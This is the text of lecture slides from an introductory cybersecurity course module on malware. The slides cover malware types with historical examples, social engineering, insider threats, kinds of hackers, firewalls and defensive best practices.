Malware

Learning Outcomes
• Describe major types of malware
• Explain the characters of computer virus and ransomware
• Describe how social engineering work
• Explain the role of firewall in protecting the computer system
• Describe different type of inside threats and hacker
• Discuss the best practices against malware attacks & inside
threats

2
Overview
• Malware
• Malicious intent
• Grayware
• Actors in malware attacks
• Social engineering
• Insiders, hacker
• Prevent malware attacks

3
Malware
• Any malicious program or code that is harmful to systems
• Virus
• Worms
• Spyware/adware
• Trojan
• Ransomware
• Rootkit
• A Keylogger
• Malicious cryptomining
• Exploits

4
Malware Features and Types
• Infectious:
• Viruses, worms
• Concealment:
• Trojan horses, logic bombs, rootkits
• Malware for stealing information:
• Spyware, keyloggers, screen scrapers
• Malware for profit:
• Dialers, scarewares, ransomware
• Malware as platform for other attacks
• Botnets, backdoors (trapdoors)
• Many malwares have characteristics of multiple types

5
Malware

6
Malware Infection Growth Rate

7
Infectious
 Computer Virus
• Requires a host program
• Requires user action to transmit from one system to another
• Attaches bits of its own malicious code to other files or replaces
files outright with copies of itself
• Don’t catch headline as in the past, but still need to take it
seriously.
 Computer Virus
• Attach itself to a host (often a program) and replicate itself

• Self-replicating code
• Self-replicating Trojan horses
• Alters normal code with “infected” version

• Operates when infected code executed

If spread condition then
For target files
if not infected then alter to include virus
Perform malicious action
Execute normal program
 ILOVEYOU Virus (2000):
• Geographic Impact: The ILOVEYOU virus spread
globally, affecting computers across Asia, Europe,
and North America. It was one of the most
widespread viruses in history.

• Affected Systems: Primarily affected Microsoft

Windows-based systems through email clients such
as Microsoft Outlook. It overwrote files with certain
extensions, such as .jpg, .mp3, and .doc.

• Consequences: It caused an estimated $10 billion in

damages and took down government agencies,
corporations, and private users' systems, requiring
extensive recovery efforts.
 Worm
• Self-replicating malware that does not require a host program
• Propagates a fully working version of itself to other machines
• Carries a payload performing hidden tasks
• Backdoors, spam relays, DDoS agents; …
• Phases
Probing → Exploitation → Replication → Payload
Concealment
 Trojan Horse
• Software that appears to perform a desirable function for the
user prior to run or install, but (perhaps in addition to the
expected function) steals information or harms the system

• Trojans masquerade as legitimate software, tricking users into

installing them. They open backdoors or perform malicious
activities.

• Effects: Can steal data, install additional malware, or enable

remote access.
 Logic Bomb
• Embedded in legitimate programs
• Activated when specified conditions met
• E.g., presence/absence of some file; Particular date/time or particular
user
• When triggered, typically damages system
• Modify/delete files/disks
 Rootkit
• A rootkit is software that enables continued privileged access to
a computer while actively hiding its presence from
administrators by subverting standard operating system
functionality or other applications.

• Emphasis is on hiding information from administrators’ view, so

that malware is not detected
• E.g., hiding processes, files, opened network connections, etc
Stealing Information
 Spyware
• Software that secretly monitors user activities, gathering data
without consent.

• Pegasus (2016,2019, 2001,2003,2005,2006,2021)

• Developed by the NSO Group, Pegasus is one of the most
advanced spyware tools. It can infect iOS and Android devices,
enabling the operator to access contacts, messages, emails,
and even microphone and camera functions without the user’s
knowledge.
 Keyloggers
• Keyloggers record every keystroke made on a computer,
capturing sensitive information like passwords and credit card
numbers.

• Effects: Compromises accounts and financial data.

• Examples:
• Agent Tesla: A remote-access Trojan that steals credentials.
• Ardamax Keylogger: Used for both legitimate monitoring and
malicious purposes.
 Fileless Malware
• Fileless malware operates entirely in a computer’s memory,
leaving no trace on the hard drive. This makes it difficult for
traditional antivirus software to detect.
• Effects: Enables stealth attacks, often used for espionage or
data theft.
• Examples:
• Astaroth: Used to steal information by running in the system’s
memory.
• PowerGhost: A cryptojacking malware that mines
cryptocurrency silently.
For Profit
 Dialers
• Programs that connect a computer to expensive phone
numbers to generate revenue for the attacker.

Scareware
• Fake security warnings designed to scare users into buying
unnecessary or harmful software.
Ransomware
• Scareware
• Screen lockers
• Encrypting ransomware

23
Ransomware
• Ransomware encrypts files and demands a ransom payment for
decryption keys.

• Effects: Prevents access to critical files or systems, potentially halting

business operations.

• Examples:
• Medusa: known for its double-extortion tactics, where attackers
encrypt data on compromised systems and threaten to publicly
release it unless a ransom is paid.
• LockBit: A highly targeted ransomware-as-a-service operation.

24
Platform for other Attacks
 Botnet
• A botnet is a network of compromised devices controlled
remotely by a hacker. These devices, or "bots," are used to
carry out large-scale attacks.

• Effects: Enables distributed denial-of-service (DDoS) attacks,

spam campaigns, and data breaches.

• Examples:
• Mirai: Exploited IoT devices to launch massive DDoS attacks.
• BredoLab: A botnet used to distribute spam and malware.
Adware
• Adware displays intrusive advertisements and redirects users to
potentially malicious websites.

• Effects: Slows down systems and can serve as a gateway for more
harmful malware.

• Examples:
• Fireball: Turned browsers into ad-generating machines, affecting
millions of devices.
• Gator: Displayed targeted ads by monitoring users’ web activity.

27
Grayware
• Privacy-invasive software
• Convey the commercial aspect of unwanted software contamination
• Potentially unwanted program
• Unwanted despite having been downloaded by the user
• Adware & spyware

28
Social Engineering
• Hack people’s mind
• 98% of cyber attacks rely on social engineering
• Getting victim to:
• Give up usernames and passwords
• Install malware on their device
• Send money via electronic fund transfer, money order, or gift cards
• Authorize a malicious software plugin, extension, or third-party app
• Act as a money mule

IT 6823 – LM7 Malware 29

Human Vulnerabilities for Social Engineering
• Reciprocity
• Scarcity
• Authority
• Consistency
• Liking
• Consensus

30
Types of Social Engineering
• Email phishing
• Trojan
• Spearing fishing
• SMS text message phishing (smithing)
• Scam calls
• Tech support scams

31
Inside Treats
• Malicious insider
• A mole
• Careless users
• Most common threat

32
Insider Threat Behavior

33
Hacker
• Purpose of hacking
• Criminal financial gain
• Fame and reputation
• Corporate espionage
• State-sponsored hacking
• Hacktivist

34
Types of Hacker
• Black hat
These hackers engage in illegal activities, breaching systems to steal
data, spread malware, or cause damage.
• White hat
These hackers use their skills to help organizations strengthen their
cybersecurity. They are usually employed by companies to find
vulnerabilities before malicious hackers can exploit them.
• Gray hat
These hackers fall between white and black hat hackers. They may find
vulnerabilities without permission but do not exploit them for personal
gain. Often, they inform the affected company afterward.

35
Types of Hacker
• Script Kiddies
These individuals lack deep technical skills and often use pre-made
tools or scripts developed by others to launch attacks. Their motivation
is often for fun or to show off their abilities.
• Hacktivists
• Hackers who use their skills for political or social activism. They hack
into systems to promote a cause, make a statement, or expose
wrongdoing.
• State-Sponsored Hackers
• Hackers employed or funded by a government to conduct cyber
espionage or disrupt the operations of rival nations. These activities
often involve data theft, sabotage, or spreading propaganda.

36
Types of Hacker
• Red Hat Hackers
• These are like vigilante hackers who target black hat hackers. Instead
of reporting them to authorities, they use their skills to disrupt the
malicious activities of these hackers.
• Blue Hat Hackers
• Hackers invited by organizations to test systems for vulnerabilities but
are not employed as security professionals. Often brought in for
specific projects or bug bounty programs.
• Green Hat Hackers
• These are beginners who are learning to hack. They aspire to become
full-fledged hackers and spend time gaining knowledge from
communities and mentors.

37
Factors make a system more vulnerable to
malware
• Security defects in software
• Insecure design or user error
• Over-privileged users and code
• Use of the same operating system

38
Firewall
• Restrict outside access to your computer/network
• Block traffic from certain location, applications or ports
• Allowing relevant and necessary data through
• Hardware firewall
• Network firewalls
• Software firewall
• Built in most OS
• Third party app

39
Best Practices against Malware Attacks
• Continuous User Education
• Use Reputable A/V Software
• Ensure Your Network is Secure
• Perform Regular Website Security Audits
• Scanning your organization’s websites regularly for
vulnerabilities
• Create Regular, Verified Backups

40
Protect Against an Insider Attack
• Protect critical assets
• Enforce policies
• Increase visibility
• Promote culture changes

41
Insider Threat Detection Solutions
• Insider familiar with security measures
• Combine several tools
• Machine learning tools for analyzing data stream and prioritizing alerts
• Behavior analytics
• Database activity monitoring

42